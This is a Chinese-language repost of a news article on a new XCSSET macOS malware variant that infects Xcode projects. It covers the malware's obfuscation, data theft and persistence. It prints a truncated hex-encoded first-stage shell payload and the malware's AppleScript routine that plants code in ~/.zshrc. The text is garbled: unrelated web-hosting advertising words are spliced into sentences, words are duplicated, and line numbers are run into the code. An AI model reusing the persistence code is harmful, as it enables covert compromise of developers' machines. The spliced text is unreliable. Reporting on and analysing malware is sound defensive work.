您现在的位置是:数据库 >>正文
新型 XCSSET 恶意软件利用增强混淆技术攻击 macOS 用户
数据库21617人已围观
简介微软威胁情报团队发现了一种新型的XCSSET变种,这是一种复杂的模块化macOS恶意软件,能够感染Xcode项目,并在开发者构建这些项目时执行。这是自2022年以来的首个已知XCSSET变种,采用了增 ...
微软威胁情报团队发现了一种新型的新型XCSSET变种,这是恶意一种复杂的模块化macOS恶意软件 ,能够感染Xcode项目 ,软件并在开发者构建这些项目时执行。利用
这是增强自2022年以来的首个已知XCSSET变种,采用了增强的混淆户混淆方法、更新的技术持久化机制以及新的感染策略 ,亿华云旨在窃取macOS用户的攻击敏感信息 。

该恶意软件的感染策略利用了开发者在开发与Apple或macOS相关的应用程序时共享项目文件的方式。新型XCSSET变种采用了模块化的恶意方式,其有效载荷经过深度编码 ,软件并改进了错误处理机制 。利用
为了在受感染设备上保持低调并尽可能保持无文件状态,增强该恶意软件广泛使用脚本语言、混淆户UNIX命令和合法二进制文件,高防服务器技术这使得检测和清除变得极具挑战性。在代码层面,恶意软件对模块名称进行混淆,以阻碍静态分析 ,并采用随机化方法生成有效载荷 。
与之前的变种仅依赖xxd(hexdump)进行编码不同,最新版本还引入了Base64编码技术 。
持久化技术该恶意软件采用了三种不同的持久化技术 ,确保其有效载荷在以下情况下启动:新shell会话开始 、用户打开伪造的Launchpad应用程序或开发者在Git中提交更改。
微软研究人员指出,源码库感染链由四个阶段组成,首先是构建受感染的Xcode项目时运行的混淆shell有效载荷。

混淆的第一阶段 shell payload(来源 – Microsoft)
第一阶段的有效载荷在被传输到 shell 之前 ,会经过多次十六进制解码迭代:
复制sh -c"(echo 333363632333436333352333035361.在初始感染之后 ,该恶意软件会从其命令与控制服务器(C2)下载额外的模块,其中包括能够窃取系统信息 、浏览器扩展数据 、数字钱包信息以及来自 “备忘录” 应用程序的香港云服务器笔记内容的组件。
该恶意软件通过几种复杂的方法来实现驻留 。其中一种方法是修改~/.zshrc 文件,以便在每次启动新的 shell 会话时执行恶意代码。

.zshrc 驻留方法(来源 :微软)
恶意软件在利用.zshrc 文件驻留时 ,会先检查是否存在恢复标志 ,然后根据标志决定是删除恶意文件 ,还是云计算创建并更新它:
复制on doMain() try if RESTORE_DEFAULT is true then do shell script "rm -f ~/.zshrc_aliases" log ".zshrc_aliases removed" else set payload to getPayloadBody("Terminal") set payload to quoted form of payload do shell script "echo " & payload & " > ~/.zshrc_aliases" log ".zshrc_aliases updated" set payload to "[ -f $HOME/.zshrc_aliases ] && . $HOME/.zshrc_aliases" set payload to quoted form of payload do shell script "touch ~/.zshrc" do shell script "grep -qF .zshrc_aliases ~/.zshrc || echo " & payload & " >> ~/.zshrc" log ".zshrc done" end if on error the errorMessage log "failed at .zshrc: " & errorMessage return end try end doMain1.2.3.4.5.6.7.8.9.10.11.12.13.14.15.16.17.18.19.20.21.另一种驻留手段是创建一个伪装成启动台的恶意应用,只要用户试图打开真正的启动台,这个伪装应用就会执行恶意代码。
此外,恶意软件还会通过修改 Git 仓库的预提交钩子,在开发者提交更改时执行有效载荷,从而感染 Git 仓库 。
微软建议用户及时更新到最新版本的操作系统 ,在使用 Xcode 项目时仔细检查,建站模板同时启用微软端点防护软件(Microsoft Defender for Endpoint)等安全防护工具 ,这些工具能够检测并隔离该恶意软件变种 ,有效保护系统安全。
Tags:
转载:欢迎各位朋友分享到网络,但转载请说明文章出处“商站动力”。http://www.noorid.com/html/811d599183.html
相关文章
Electron 被曝远程代码执行漏洞,Discord、Notion、Teams 受影响
数据库安全研究人员发现,Discord、Microsoft Teams 和其他应用软件所使用的底层框架存在 RCE远程代码执行)漏洞。上周四在拉斯维加斯举行的黑帽网络安全大会 (Black Hat cybe ...
【数据库】
阅读更多物理隔离网络真的安全吗?
数据库近日,一种代号为“水蝮蛇”的美方窃密设备引发了网络安全领域的广泛关注。该设备伪装成常见的USB接头,能够模拟成键盘、鼠标等外设,逃避相关安全软件检测,一旦接入到原本被认为安全的物理隔离网络设备上,便能 ...
【数据库】
阅读更多立即修复!五眼联盟公布最常被利用的15个漏洞名单
数据库近日,美国联邦调查局FBI)、国家安全局NSA)及“五眼联盟”成员国的网络安全机构联合发布了一份报告,公布了2023年网络犯罪分子最常利用的15个安全漏洞。这些漏洞大多涉及零日攻击,威胁全球企业网络安 ...
【数据库】
阅读更多
热门文章
最新文章
友情链接
- 揭秘苹果耳机6s音质的绝佳表现(聆听细节世界,感受耳边的音乐奇迹)
- 如何评估数据中心?高度互联的生态系统是关键
- 以友唱(与好友合唱,畅享音乐的魅力)
- 推动产学研融合创新发展,紫光云工业互联网平台应用创新推广中心落地辽宁
- 推动产学研融合创新发展,紫光云工业互联网平台应用创新推广中心落地辽宁
- AMDA87410处理器的性能及特点分析(探索AMDA87410处理器的优势和应用领域)
- 昊诚电池(以昊诚电池怎么样为主题的研究及评价分析)
- HP系统重装教程(详解HP系统重装步骤,让你的电脑焕然一新)
- HTCM8像素之超越期待的照相机(HTCM8搭载的照相技术让您拍照更具细节和清晰度)
- 探索SonyVaioVPCEA28EC的功能与性能(一款值得关注的笔记本电脑选择) 网站建设亿华云b2b信息平台云服务器源码库企业服务器香港物理机